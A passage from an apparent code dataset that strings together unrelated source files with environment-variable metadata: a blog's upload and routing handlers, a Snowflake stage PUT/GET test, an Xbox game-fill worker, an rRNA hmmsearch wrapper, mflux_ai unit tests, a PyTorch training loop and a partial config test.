class LogInOut(BaseRequestHandler):
def get(self):
if self.request.path == '/blog/login':
self.redirect(self.get_login_url(True))
if self.request.path == '/blog/logout':
self.redirect(self.get_logout_url(True))
class Upload(BaseRequestHandler):
def get(self):
filename = self.request.path[13:]
split = filename.rfind('.')
if split == -1:
name, ext = filename, ''
else:
name = filename[:split]
ext = filename[split + 1:]
file = UploadFile.get(db.Key(name))
if not file:
self.redirect('/static/pages/404.html')
elif file.ext != ext:
self.redirect('/static/pages/404.html')
else:
ext = '.' + ext
mimetype = 'application/octet-stream'
if ext in types_map:
mimetype = types_map[ext]
self.response.headers['Content-Type'] = mimetype
self.response.headers['Content-Disposition'] = \
'inline; filename="' + file.orig_name.encode('utf-8') + '"'
self.write(file.data)
def post(self):
if self.chk_admin():
filename = self.param('filename')
fileext = self.param('fileext')
data = self.param('upfile')
UploadFile(orig_name = filename, ext = fileext, data = data).put()
self.redirect('/blog/filemanager')
class FileManager(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "upload"
files = UploadFile.all().order('-date')
self.template_values.update({
'files': files,
})
self.render(self.theme.filemanager_page)
def post(self): # delete files
if self.chk_admin():
delids = self.request.POST.getall('del')
if delids:
for id in delids:
file = UploadFile.get_by_id(int(id))
file.delete()
self.redirect('/blog/filemanager')
class BlogRollManager(BaseRequestHandler):
def get(self): # delete a link
if self.chk_admin():
delid = self.param('delid')
bloglink = BlogRoll.get_by_id(int(delid))
if bloglink:
bloglink.delete()
self.redirect(self.referer)
def post(self): # add a link
if self.chk_admin():
try:
bloglink = BlogRoll(url = self.param('url'),
text = self.param('text'),
description = self.param('description'))
bloglink.put()
except:
pass
self.redirect(self.referer)
class NotFound(BaseRequestHandler):
def get(self):
self.redirect('/static/pages/404.html')
def main():
webapp.template.register_template_library('filter')
application = webapp.WSGIApplication(
[
#('/', PostList),
('/blog', PostList),
('/blog/', PostList),
('/blog/page/\\d+', PostList),
('/blog/tag/.+/page/\\d+', PostList),
('/blog/tag/.+', PostList),
('/blog/post/\\d+', ViewPost),
('/blog/newpost', NewPost),
('/blog/newcomment', NewComment),
('/blog/editpost/\\d+', EditPost),
('/blog/editcomment/\\d+', EditComment),
('/blog/deletepost', DeletePost),
('/blog/deletecomment', DeleteComment),
('/blog/custom', Customize),
('/blog/feed', RssFead),
('/blog/feed/tag/.+', RssFead),
('/blog/login', LogInOut),
('/blog/logout', LogInOut),
('/blog/upload', Upload),
('/blog/upload/.+', Upload),
('/blog/upload/', FileManager),
('/blog/filemanager', FileManager),
('/blog/addbloglink', BlogRollManager),
('/blog/delbloglink', BlogRollManager),
#('.*', NotFound),
],
debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
| []
| []
| [
"DJANGO_SETTINGS_MODULE"
]
| [] | ["DJANGO_SETTINGS_MODULE"] | python | 1 | 0 | |
put_get_user_stage_test.go | package gosnowflake
import (
"context"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strconv"
"strings"
"testing"
)
func TestPutGetFileSmallDataViaUserStage(t *testing.T) {
if os.Getenv("AWS_ACCESS_KEY_ID") == "" {
t.Skip("this test requires to change the internal parameter")
}
putGetUserStage(t, "", 5, 1, false)
}
func TestPutGetStreamSmallDataViaUserStage(t *testing.T) {
if os.Getenv("AWS_ACCESS_KEY_ID") == "" {
t.Skip("this test requires to change the internal parameter")
}
putGetUserStage(t, "", 1, 1, true)
}
func putGetUserStage(t *testing.T, tmpDir string, numberOfFiles int, numberOfLines int, isStream bool) {
if os.Getenv("AWS_SECRET_ACCESS_KEY") == "" {
t.Fatal("no aws secret access key found")
}
tmpDir, _ = ioutil.TempDir(tmpDir, "data")
tmpDir = generateKLinesOfNFiles(numberOfLines, numberOfFiles, false, tmpDir)
defer os.RemoveAll(tmpDir)
var files string
if isStream {
list, _ := ioutil.ReadDir(tmpDir)
file := list[0].Name()
files = filepath.Join(tmpDir, file)
} else {
files = filepath.Join(tmpDir, "file*")
}
runTests(t, dsn, func(dbt *DBTest) {
stageName := fmt.Sprintf("%v_stage_%v_%v", dbname, numberOfFiles, numberOfLines)
dbt.mustExec(fmt.Sprintf("create or replace table %v (aa int, dt date, ts timestamp, tsltz timestamp_ltz, tsntz timestamp_ntz, tstz timestamp_tz, pct float, ratio number(6,2))", dbname))
userBucket := os.Getenv("SF_AWS_USER_BUCKET")
if userBucket == "" {
userBucket = fmt.Sprintf("sfc-dev1-regression/%v/reg", user)
}
dbt.mustExec(fmt.Sprintf("create or replace stage %v url='s3://%v}/%v-%v-%v' credentials = (AWS_KEY_ID='%v' AWS_SECRET_KEY='%v')", stageName, userBucket, stageName, numberOfFiles, numberOfLines, os.Getenv("AWS_ACCESS_KEY_ID"), os.Getenv("AWS_SECRET_ACCESS_KEY")))
dbt.mustExec("alter session set disable_put_and_get_on_external_stage = false")
dbt.mustExec("rm @" + stageName)
var fs *os.File
if isStream {
fs, _ = os.OpenFile(files, os.O_RDONLY, os.ModePerm)
ctx := WithFileStream(context.Background(), fs)
dbt.mustExecContext(ctx, fmt.Sprintf("put 'file://%v' @%v", strings.ReplaceAll(files, "\\", "\\\\"), stageName))
} else {
dbt.mustExec(fmt.Sprintf("put 'file://%v' @%v ", strings.ReplaceAll(files, "\\", "\\\\"), stageName))
}
defer func() {
if isStream {
fs.Close()
}
dbt.mustExec("rm @" + stageName)
dbt.mustExec("drop stage if exists " + stageName)
dbt.mustExec("drop table if exists " + dbname)
}()
dbt.mustExec(fmt.Sprintf("copy into %v from @%v", dbname, stageName))
rows := dbt.mustQuery("select count(*) from " + dbname)
var cnt string
if rows.Next() {
rows.Scan(&cnt)
}
count, _ := strconv.Atoi(cnt)
if count != numberOfFiles*numberOfLines {
t.Errorf("count did not match expected number. count: %v, expected: %v", count, numberOfFiles*numberOfLines)
}
})
}
| [
"\"AWS_ACCESS_KEY_ID\"",
"\"AWS_ACCESS_KEY_ID\"",
"\"AWS_SECRET_ACCESS_KEY\"",
"\"SF_AWS_USER_BUCKET\"",
"\"AWS_ACCESS_KEY_ID\"",
"\"AWS_SECRET_ACCESS_KEY\""
]
| []
| [
"SF_AWS_USER_BUCKET",
"AWS_ACCESS_KEY_ID",
"AWS_SECRET_ACCESS_KEY"
]
| [] | ["SF_AWS_USER_BUCKET", "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY"] | go | 3 | 0 | |
gamefill.go | package main
import (
"database/sql"
"encoding/json"
"flag"
"fmt"
"os"
"time"
"github.com/FederationOfFathers/xboxapi"
"go.uber.org/zap"
gomail "gopkg.in/gomail.v2"
)
const (
platformUnknown = iota
platformXbox360
platformXboxOne
platformWindows
platformIOS
platformAndroid
platformMobile
platformGearVR
platformKindle
)
var cdnPutKey = os.Getenv("CDN_PUT_KEY")
var doGameFill = false
func init() {
flag.BoolVar(&doGameFill, "games", doGameFill, "Dev -- fill games")
}
func initGameFill() {
if !development || doGameFill {
logger.Debug("Doing Game Filling")
handlers[1]["checkGames"] = doCheckGames
crontab.AddFunc("@every 8s", cronwrap("queueFillGames", queueFillGames))
crontab.AddFunc("@every 3600s", cronwrap("doPopulateMissingGamesMeta", doPopulateMissingGamesMeta))
} else {
logger.Debug("Skipping Game Filling")
}
}
func doPopulateMissingGamesMeta(cronID int, name string) {
fillGamesCheck.Exec()
}
func devicesToPlatform(devices []string) int {
var is = map[string]bool{}
for _, device := range devices {
is[device] = true
}
if is, _ := is["XboxOne"]; is {
return platformXboxOne
}
if is, _ := is["Xbox360"]; is {
return platformXbox360
}
if is, _ := is["Win32"]; is {
return platformWindows
}
if is, _ := is["PC"]; is {
return platformWindows
}
if is, _ := is["iOS"]; is {
return platformIOS
}
if is, _ := is["Android"]; is {
return platformAndroid
}
if is, _ := is["Mobile"]; is {
return platformMobile
}
if is, _ := is["Gear VR"]; is {
return platformGearVR
}
if is, _ := is["Kindle"]; is {
return platformKindle
}
if is, _ := is["Kindle Fire"]; is {
return platformKindle
}
return platformUnknown
}
func resolveConsole(title *xboxapi.TilehubTitle, log *zap.Logger) (int, error) {
if kind := devicesToPlatform(title.Devices); kind != platformUnknown {
return kind, nil
}
details, err := getXboxTitleByString(title.TitleID)
if err != nil {
return platformUnknown, err
}
if kind := devicesToPlatform(details.Devices()); kind != platformUnknown {
return kind, nil
}
if len(details.Items) > 0 {
if details.Items[0].MediaGroup == "GameType" {
if details.Items[0].MediaItemType == "DGame" || details.Items[0].MediaItemType == "DGameDemo" {
return platformXboxOne, nil
}
}
}
return platformUnknown, nil
}
func doFillGame(title *xboxapi.TilehubTitle, platform int) error {
var log = logger.With(
zap.String("function", "resolveConsole"),
zap.Int("platform", platform),
zap.String("title", title.Name),
zap.String("id", title.TitleID))
log.Debug("filling")
var gameID int
var gameName string
var gameImage string
row := getGameInfo.QueryRow(platform, title.TitleID)
if err := row.Scan(&gameID, &gameName, &gameImage); err != nil {
log.Error("error scanning", zap.Error(err))
return err
}
if gameImage == "" && title.DisplayImage != "" {
imageKey := fmt.Sprintf("game-image-%d", gameID)
if err := cdnImage(title.DisplayImage, imageKey); err != nil {
log.Error("error storing image", zap.Error(err))
return err
}
if _, err := setGameInfo.Exec(imageKey, gameID); err != nil {
log.Error("error updating", zap.Error(err))
return err
}
}
return nil
}
func doCheckGames(job json.RawMessage) error {
var start = time.Now()
var log = logger.With(zap.String("type", "handler"), zap.String("handler", "doCheckGames"))
var user *memberXboxInfo
if err := json.Unmarshal(job, &user); err != nil {
log.Error("Error unmarshalling", zap.Error(err))
return err
}
if _, err := doStmt(setMemberMeta, user.ID, "_games_last_check", timeBuf()); err != nil {
log.Error("Error setting _games_last_check", zap.Error(err))
return err
}
log = log.With(zap.String("member", user.Name), zap.String("xuid", user.XUID))
apiRes, err := xbl.TileHub(user.XUID)
if err != nil {
log.Error("Error checking TileHub", zap.String("username", user.Name), zap.String("xuid", user.XUID), zap.Error(err))
return err
}
var examined = 0
var new = 0
var added = 0
if apiRes == nil || apiRes.Titles == nil || len(apiRes.Titles) < 1 {
log.Info("no titles returned for user titlehub-achievement-list", zap.String("username", user.Name), zap.String("xuid", user.XUID))
} else {
for _, title := range apiRes.Titles {
examined++
resolved, err := resolveConsole(title, log)
if err != nil {
log.Error("error resolving", zap.String("id", title.TitleID), zap.Error(err))
continue
}
if resolved == platformUnknown {
m := gomail.NewMessage()
m.SetHeader("From", "[email protected]")
m.SetHeader("To", "[email protected]")
m.SetHeader("Subject", "Unexpected game device")
buf, _ := json.MarshalIndent(map[string]interface{}{
"user": user,
"title": title,
}, "", "\t")
m.SetBody("text/plain", string(buf))
d := gomail.Dialer{Host: "localhost", Port: 587}
if err := d.DialAndSend(m); err != nil {
log.Error("Error sending email notice...")
}
log.Error("Unexpected game device", zap.String("title", title.Name), zap.String("id", title.TitleID))
continue
}
gameID, err := mysqlCreateGame(resolved, title.TitleID, title.Name)
if err != nil {
log.Error("error creating game", zap.String("title", title.Name), zap.String("id", title.TitleID), zap.Error(err))
return err
}
res, err := ownGame.Exec(user.ID, gameID, title.TitleHistory.LastTimePlayed.Time())
if err != nil {
log.Info(string(title.TitleHistory.LastTimePlayed), zap.Time("parsed", title.TitleHistory.LastTimePlayed.Time()))
log.Error("error owning game", zap.String("title", title.Name), zap.String("id", title.TitleID), zap.Error(err))
return err
}
if id, err := res.LastInsertId(); err != nil && id > 0 {
log.Debug(
"owning",
zap.String("title", title.Name),
zap.String("platform_id", title.TitleID),
zap.Int("platform", resolved),
zap.Int("local_id", gameID),
zap.Int64("relationship", id),
)
added++
} else {
log.Debug(
"updating",
zap.String("title", title.Name),
zap.String("platform_id", title.TitleID),
zap.Int("platform", resolved),
zap.Int("local_id", gameID),
)
}
}
}
log.Info("run complete", zap.Int("games-created", new), zap.Int("added", added), zap.Int("examined", examined), zap.Duration("took", time.Now().Sub(start)))
return nil
}
func queueFillGames(cronID int, name string) {
var log = logger.With(zap.String("type", "cron"), zap.Int("id", cronID), zap.String("name", name))
var data = memberXboxInfo{}
log.Debug("findNeedGameFill", zap.Int64("seen", agoTs(month)), zap.ByteString("_games_last_check", agoBytes(time.Hour)))
row := findNeedGameFill.QueryRow(agoTs(month), agoBytes(time.Hour))
if row == nil {
log.Debug("no users need games filled")
return
}
if err := row.Scan(&data.ID, &data.XBL, &data.Name, &data.XUID, &data.LastCheck); err != nil {
if err == sql.ErrNoRows {
log.Debug("no users need games filled")
} else {
log.Error("error scanning row", zap.Error(err))
}
return
}
if _, err := doStmt(setMemberMeta, data.ID, "_games_last_check", timeBuf()); err != nil {
log.Error("Error setting _games_last_check", zap.Error(err))
return
}
enqueuev1("checkGames", data)
logger.Debug("queued", zap.String("username", data.Name), zap.String("xuid", data.XUID), zap.Int("userid", data.ID))
}
| [
"\"CDN_PUT_KEY\""
]
| []
| [
"CDN_PUT_KEY"
]
| [] | ["CDN_PUT_KEY"] | go | 1 | 0 | |
tools/rnahmm/rna_hmm/rna_hmm3.py | #! /usr/bin/env python
import os
import sys
import string
import optparse
import fasta
import math
def format(seq, N=60):
nseg = int(math.ceil(len(seq)/(N+0.0)))
return '\n'.join([seq[i * N:(i + 1) * N] for i in range(nseg)])
# write into fasta format file
parser = optparse.OptionParser(version="%prog ")
parser.add_option(
"-i", "--input", dest="input_fasta", action="store",
help="name of input file in fasta format")
parser.add_option(
"-L", "--LibHmm", dest="hmm_path", action="store",
default="HMM3", help="path of hmm database")
parser.add_option(
"-o", "--output", dest="out_fname", action="store",
help="name of output file")
parser.add_option(
"-k", "--kingdoms", dest="kingdoms", action="store",
default="arc,bac", help="kingdom used")
# default="arc,bac,euk", help="kingdom used")
parser.add_option(
"-r", "--hmmsearch", dest="hmmsearch", action="store", default="hmmsearch",
help="path to rnammer executable")
parser.add_option(
"-m", "--moltypes", dest="moltypes", action="store",
default="lsu,ssu,tsu", help="molecule type detected")
# default="lsu,ssu,tsu,lsurnammer,ssurnammer,tsurnammer", help="molecule type detected")
parser.add_option(
"-e", "--Evalue", dest="evalue", action="store", type="float",
default=0.01, help="evalue cut-off for hmmsearch")
parser.add_option(
"-p", "--pThreads", dest="p", action="store", type="int",
default=1, help="number of threads for hmmsearch")
try:
(options, args) = parser.parse_args()
except:
parser.print_help()
sys.exit(1)
if options.input_fasta is None or options.hmm_path is None:
parser.print_help()
sys.exit(1)
# os.environ["HMMERDB"] += ":"+os.path.abspath(options.hmm_path)
# print os.environ["HMMERDB"]
out_fname = os.path.abspath(options.out_fname)
out_dir = os.path.dirname(out_fname)
fname = os.path.abspath(options.input_fasta)
tr = string.maketrans("gatcryswkmbdhvnGATCRYSWKMBDHVN", "ctagyrswmkvhdbnCTAGYRSWMKVHDBN")
def rev_record(record):
return ">" + record.header + "|rev\n" + format(record.sequence[::-1].translate(tr))
records = [rec for rec in fasta.fasta_itr(fname)]
headers = [[rec.header, len(rec.sequence)] for rec in records]
ff = open(out_fname + '.fa', 'w')
for (i, rec) in enumerate(records):
ff.write('>s' + str(i) + '\n' + format(rec.sequence) + '\n')
ff.write('>s' + str(i) + '|rev\n' + format(rec.sequence[::-1].translate(tr)) + '\n')
ff.close()
# sys.exit(1)
# a temporary fasta file, use s(int) to easy the parsing
def parse_hmmsearch(kingdom, moltype, src):
# function to parse hmmsearch output
resu = []
data = open(src).readlines()
# inds = [-1] + [i for (i, x) in enumerate(data[2]) if x == " "]
# inds = [(inds[j] + 1, inds[j + 1]) for j in range(len(inds) - 1)]
data = [line for line in data if line[0] != "#"]
for line in data:
if not len(line.strip()):
continue
[
read, acc, tlen, qname, qaccr, qlen, seq_evalue, seq_score, seq_bias,
seq_num, seq_of, dom_cEvalue, dom_iEvalue, dom_score, dom_bias,
hmm_start, hmm_end, dom_start, dom_end, env_start, env_end] = line.split()[:21]
# [line[x[0]:x[1]].strip() for x in inds[:21]]
if string.atof(dom_iEvalue) < options.evalue:
# resu.append("\t".join([read, acc, tlen, qname, qaccr, \
# qlen, seq_evalue, seq_score, seq_bias, seq_num, seq_of, \
# dom_cEvalue, dom_iEvalue, dom_score, dom_bias, hmm_start, \
# hmm_end, dom_start, dom_end, env_start, env_end]))
resu.append("\t".join([qname, dom_start, dom_end, read, dom_iEvalue]))
# print resu[0]
# print resu[-1]
return resu
hmm_resu = []
for kingdom in options.kingdoms.split(','):
for moltype in options.moltypes.split(','):
# print kingdom, moltype
hmm_out_fname = "%s.%s_%s.out" % (out_fname, kingdom, moltype)
dom_out_fname = "%s.%s_%s.dom" % (out_fname, kingdom, moltype)
cmd = '%s --cpu %d -o %s --domtblout %s -E %g %s/%s_%s.hmm %s' % \
(options.hmmsearch, options.p, hmm_out_fname, dom_out_fname,
options.evalue, os.path.abspath(options.hmm_path), kingdom, moltype, out_fname + '.fa')
# print cmd
# hmm_resu += parse_hmmsearch(os.popen(cmd))
# print cmd
os.system(cmd)
hmm_resu += parse_hmmsearch(kingdom, moltype, dom_out_fname)
os.remove(hmm_out_fname)
os.remove(dom_out_fname)
dict_read2kingdom = {}
for line in hmm_resu:
[feature_type, r_start, r_end, read, evalue] = line.strip().split('\t')
read = read.split('|')[0]
evalue = string.atof(evalue)
kingdom = feature_type.split('_')[0]
if read in dict_read2kingdom:
if evalue < dict_read2kingdom[read][1]:
dict_read2kingdom[read] = [kingdom, evalue]
else:
dict_read2kingdom[read] = [kingdom, evalue]
header = ['##seq_name', 'method', 'feature', 'start', 'end', 'evalue', 'strand', 'frame', 'attribute']
ff = open(out_fname, "w")
dict_rRNA = {
'arc_lsu': '23S_rRNA', 'arc_ssu': '16S_rRNA', 'arc_tsu': '5S_rRNA',
'bac_lsu': '23S_rRNA', 'bac_ssu': '16S_rRNA', 'bac_tsu': '5S_rRNA',
'euk_lsu': '28S_rRNA', 'euk_ssu': '18S_rRNA', 'euk_tsu': '8S_rRNA'}
# 'arc_lsurnammer': '23S_rRNA', 'arc_ssu.rnammer': '16S_rRNA', 'arc_tsurnammer': '5S_rRNA',
# 'bac_lsurnammer': '23S_rRNA', 'bac_ssu.rnammer': '16S_rRNA', 'bac_tsurnammer': '5S_rRNA',
# 'euk_lsurnammer': '28S_rRNA', 'euk_ssu.rnammer': '18S_rRNA', 'euk_tsurnammer': '8S_rRNA'
ff.write('\t'.join(header)+'\n')
for line in hmm_resu:
# [kingdom, moltype, read, acc, tlen, qname, qaccr, \
# qlen, seq_evalue, seq_score, seq_bias, seq_num, seq_of, \
# dom_cEvalue, dom_iEvalue, dom_score, dom_bias, hmm_start, \
# hmm_end, dom_start, dom_end, env_start, env_end] = line.strip().split('\t')
[feature_type, r_start, r_end, read, evalue] = line.strip().split('\t')
if dict_read2kingdom[read.split('|')[0]][0] != feature_type.split('_')[0]:
continue
feature_type = dict_rRNA[feature_type]
if read.endswith('|rev'):
strand = '-'
tmp = map(string.atoi, [r_start, r_end])
pos = string.atoi(read[1:-4])
header = headers[pos][0]
L = headers[pos][1]
[r_end, r_start] = [str(L + 1 - x) for x in tmp]
else:
strand = '+'
pos = string.atoi(read[1:])
header = headers[pos][0]
ff.write('\t'.join([header, 'rna_hmm3', 'rRNA', r_start, r_end, evalue, strand, 'NA', feature_type]) + '\n')
ff.close()
os.remove(out_fname + '.fa')
| []
| []
| [
"HMMERDB"
]
| [] | ["HMMERDB"] | python | 1 | 0 | |
tests/test_core.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the `mflux_ai` package."""
import os
import warnings
import responses
import mlflow
import mflux_ai
from mflux_ai.core import SERVER_HOST
@responses.activate
def test_mflux_ai_init():
"""Test the init function."""
content = {
"minio_secret_key": "minio_secret",
"minio_access_key": "minio_access",
"minio_server": "http://192.198.0.1:9000",
"mlflow_server": "http://192.198.0.1:5000",
}
responses.add(
responses.Response(
method="GET", url=SERVER_HOST + "/api/env_vars/", json=content, status=200
)
)
mflux_ai.init("thisshouldbevalidtoken")
assert os.environ.get("MLFLOW_TRACKING_URI") == content["mlflow_server"]
assert os.environ.get("MLFLOW_S3_ENDPOINT_URL") == content["minio_server"]
assert os.environ.get("AWS_SECRET_ACCESS_KEY") == content["minio_secret_key"]
assert os.environ.get("AWS_ACCESS_KEY_ID") == content["minio_access_key"]
assert os.environ.get("MLFLOW_TRACKING_TOKEN") == "thisshouldbevalidtoken"
@responses.activate
def test_mflux_ai_deprecated_set_env_vars():
"""Test the deprecated set_env_vars function."""
content = {
"minio_secret_key": "minio_secret",
"minio_access_key": "minio_access",
"minio_server": "http://192.198.0.1:9000",
"mlflow_server": "http://192.198.0.1:5000",
}
responses.add(
responses.Response(
method="GET", url=SERVER_HOST + "/api/env_vars/", json=content, status=200
)
)
with warnings.catch_warnings(record=True) as w:
# Cause all warnings to always be triggered.
warnings.simplefilter("always")
mflux_ai.set_env_vars("thisshouldbevalidtoken")
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert "deprecated" in str(w[-1].message)
assert os.environ.get("MLFLOW_TRACKING_URI") == content["mlflow_server"]
assert os.environ.get("MLFLOW_S3_ENDPOINT_URL") == content["minio_server"]
assert os.environ.get("AWS_SECRET_ACCESS_KEY") == content["minio_secret_key"]
assert os.environ.get("AWS_ACCESS_KEY_ID") == content["minio_access_key"]
assert os.environ.get("MLFLOW_TRACKING_TOKEN") == "thisshouldbevalidtoken"
@responses.activate
def test_get_best_run():
env_content = {
"minio_secret_key": "minio_secret",
"minio_access_key": "minio_access",
"minio_server": "http://192.198.0.1:9000",
"mlflow_server": "http://192.198.0.1:5000",
}
responses.add(
responses.Response(
method="GET",
url=SERVER_HOST + "/api/env_vars/",
json=env_content,
status=200,
)
)
mflux_ai.init("thisshouldbevalidtoken")
headers = {
"User-Agent": "mlflow-python-client/1.0.0",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive",
"Authorization": "Bearer thisshouldbevalidtoken",
}
content = {
"run": {
"info": {
"run_uuid": "123",
"experiment_id": "2",
"user_id": "Iver",
"status": "FINISHED",
"start_time": "1577979142226",
"end_time": "1577979155221",
"artifact_uri": "s3://mlflow/2/123/artifacts",
"lifecycle_stage": "active",
"run_id": "123",
},
"data": {
"metrics": [
{
"key": "error",
"value": 1.06968755342329e-05,
"timestamp": "1577979154751",
"step": "49",
}
],
"params": [
{"key": "optimizer_name", "value": "FastGANoisyDiscreteOnePlusOne"}
],
"tags": [
{"key": "mlflow.user", "value": "Iver"},
{
"key": "mlflow.source.name",
"value": "C:/Users/Iver/Code/mflux-quickstart/nevergrad_example.py",
},
{"key": "mlflow.source.type", "value": "LOCAL"},
],
},
}
}
# Mock two different URLs to account for differences in mlflow versions
responses.add(
responses.Response(
method="GET",
url=env_content["mlflow_server"] + "/api/2.0/preview/mlflow/runs/get",
json=content,
status=200,
headers=headers,
),
)
responses.add(
responses.Response(
method="GET",
url=env_content["mlflow_server"] + "/api/2.0/mlflow/runs/get",
json=content,
status=200,
headers=headers,
),
)
headers = {
"Content-Type": "application/vnd.aiascience.mflux+json; version=0.4",
"Authorization": "api-key {}".format("thisshouldbevalidtoken"),
}
content = {"run_uuid": "123"}
url = (
SERVER_HOST
+ "/api/best_run_by_model_group/best_run/?model_group_name={}".format(
"model_name"
)
)
responses.add(
responses.Response(
method="GET", url=url, json=content, status=200, headers=headers
)
)
best_run = mflux_ai.get_best_run("model_name")
assert isinstance(best_run, mlflow.entities.run.Run)
assert best_run.info.run_uuid == content["run_uuid"]
| []
| []
| [
"AWS_SECRET_ACCESS_KEY",
"MLFLOW_S3_ENDPOINT_URL",
"MLFLOW_TRACKING_TOKEN",
"AWS_ACCESS_KEY_ID",
"MLFLOW_TRACKING_URI"
]
| [] | ["AWS_SECRET_ACCESS_KEY", "MLFLOW_S3_ENDPOINT_URL", "MLFLOW_TRACKING_TOKEN", "AWS_ACCESS_KEY_ID", "MLFLOW_TRACKING_URI"] | python | 5 | 0 | |
utils/util_train.py | from torchvision import models as modelsummary
from .util import *
import torch
from torch import nn
import numpy as np
import time
import sys
import os
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="0,1"
activation = {}
def get_activation(name1, name2):
def hook(model, input, output):
activation[name1] = output.last_hidden_state.detach()
activation[name2] = output.pooler_output.detach()
return hook
def train(train_loader, hyp_params, model, bert, tokenizer, feature_extractor, optimizer, criterion, epoch):
epoch_loss = 0
model.train()
num_batches = hyp_params.n_train // hyp_params.batch_size
proc_loss, proc_size = 0, 0
total_loss = 0.0
losses = []
results = []
truths = []
n_examples = hyp_params.n_train
start_time = time.time()
for i_batch, data_batch in enumerate(train_loader):
input_ids = data_batch["input_ids"]
targets = data_batch["label"]
images = data_batch['image']
attention_mask = data_batch['attention_mask']
model.zero_grad()
if hyp_params.use_cuda:
with torch.cuda.device(0):
input_ids = input_ids.cuda()
attention_mask = attention_mask.cuda()
targets = targets.cuda()
images = images.cuda()
if images.size()[0] != input_ids.size()[0]:
continue
feature_images = feature_extractor.features(images)
feature_images = feature_extractor.avgpool(feature_images)
feature_images = torch.flatten(feature_images, 1)
feature_images = feature_extractor.classifier[0](feature_images)
bert.bert.register_forward_hook(get_activation('last', 'pool'))
outputs = bert(input_ids, attention_mask)
outputs = model(
last_hidden=activation['last'],
pooled_output=activation['pool'],
feature_images=feature_images
)
if hyp_params.dataset == 'memotion':
_, preds = torch.max(outputs, dim=1)
elif hyp_params.dataset == 'reddit':
_, preds = torch.max(outputs, dim=1)
else:
preds = outputs
preds_round = (preds > 0.5).float()
loss = criterion(outputs, targets)
losses.append(loss.item())
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), hyp_params.clip)
optimizer.step()
total_loss += loss.item() * hyp_params.batch_size
results.append(preds)
truths.append(targets)
proc_loss += loss * hyp_params.batch_size
proc_size += hyp_params.batch_size
if i_batch % hyp_params.log_interval == 0 and i_batch > 0:
train_acc, train_f1, train_f1_macro, train_precision, train_recall = metrics(preds_round, targets)
avg_loss = proc_loss / proc_size
elapsed_time = time.time() - start_time
msg = 'Epoch {:2d} | Batch {:3d}/{:3d} | Time/Batch(ms) {:5.2f} | Train Loss {:5.4f} | Acc {:5.4f} | micro-score {:5.4f} | macro-score {:5.4f} | precision {:5.4f} | recall {:5.4f}'.format(epoch, i_batch, num_batches, elapsed_time * 1000 / hyp_params.log_interval, avg_loss, train_acc, train_f1, train_f1_macro, train_precision, train_recall)
print(msg)
write_log(msg)
proc_loss, proc_size = 0, 0
start_time = time.time()
avg_loss = total_loss / hyp_params.n_train
results = torch.cat(results)
truths = torch.cat(truths)
return results, truths, avg_loss
def evaluate(valid_loader, hyp_params, model, bert, tokenizer, feature_extractor, criterion, train=False, train_loader=None):
model.eval()
loader = train_loader if train else valid_loader
total_loss = 0.0
results = []
truths = []
correct_predictions = 0
with torch.no_grad():
for i_batch, data_batch in enumerate(loader):
input_ids = data_batch["input_ids"]
targets = data_batch["label"]
images = data_batch['image']
attention_mask = data_batch['attention_mask']
if hyp_params.use_cuda:
with torch.cuda.device(0):
input_ids = input_ids.cuda()
attention_mask = attention_mask.cuda()
targets = targets.cuda()
images = images.cuda()
if images.size()[0] != input_ids.size()[0]:
continue
with torch.no_grad():
feature_images = feature_extractor.features(images)
feature_images = feature_extractor.avgpool(feature_images)
feature_images = torch.flatten(feature_images, 1)
feature_images = feature_extractor.classifier[0](feature_images)
bert.bert.register_forward_hook(get_activation('last', 'pool'))
outputs = bert(input_ids, attention_mask)
outputs = model(
last_hidden=activation['last'],
pooled_output=activation['pool'],
feature_images=feature_images
)
if hyp_params.dataset == 'memotion':
_, preds = torch.max(outputs, dim=1)
elif hyp_params.dataset == 'reddit':
_, preds = torch.max(outputs, dim=1)
else:
preds = outputs
total_loss += criterion(outputs, targets).item() * hyp_params.batch_size
correct_predictions += torch.sum(preds == targets)
# Collect the results into dictionary
results.append(preds)
truths.append(targets)
avg_loss = total_loss / (hyp_params.n_train if train else hyp_params.n_valid)
results = torch.cat(results)
truths = torch.cat(truths)
return results, truths, avg_loss
| []
| []
| [
"CUDA_DEVICE_ORDER",
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_DEVICE_ORDER", "CUDA_VISIBLE_DEVICES"] | python | 2 | 0 | |
pkg/config/config_test.go | package config
import (
"io/ioutil"
"os"
"sort"
"github.com/containers/common/pkg/apparmor"
"github.com/containers/common/pkg/capabilities"
. "github.com/onsi/ginkgo"
"github.com/onsi/gomega"
selinux "github.com/opencontainers/selinux/go-selinux"
)
var _ = Describe("Config", func() {
BeforeEach(beforeEach)
Describe("ValidateConfig", func() {
It("should succeed with default config", func() {
// Given
// When
defaultConfig, err := NewConfig("")
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(defaultConfig.Containers.ApparmorProfile).To(gomega.Equal(apparmor.Profile))
gomega.Expect(defaultConfig.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
})
It("should succeed with devices", func() {
// Given
sut.Containers.Devices = []string{"/dev/null:/dev/null:rw",
"/dev/sdc/",
"/dev/sdc:/dev/xvdc",
"/dev/sdc:rm",
}
// When
err := sut.Containers.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail wrong max log size", func() {
// Given
sut.Containers.LogSizeMax = 1
// When
err := sut.Validate()
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
It("should succeed with valid shm size", func() {
// Given
sut.Containers.ShmSize = "1024"
// When
err := sut.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
// Given
sut.Containers.ShmSize = "64m"
// When
err = sut.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail wrong shm size", func() {
// Given
sut.Containers.ShmSize = "-2"
// When
err := sut.Validate()
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
It("Check SELinux settings", func() {
if selinux.GetEnabled() {
sut.Containers.EnableLabeling = true
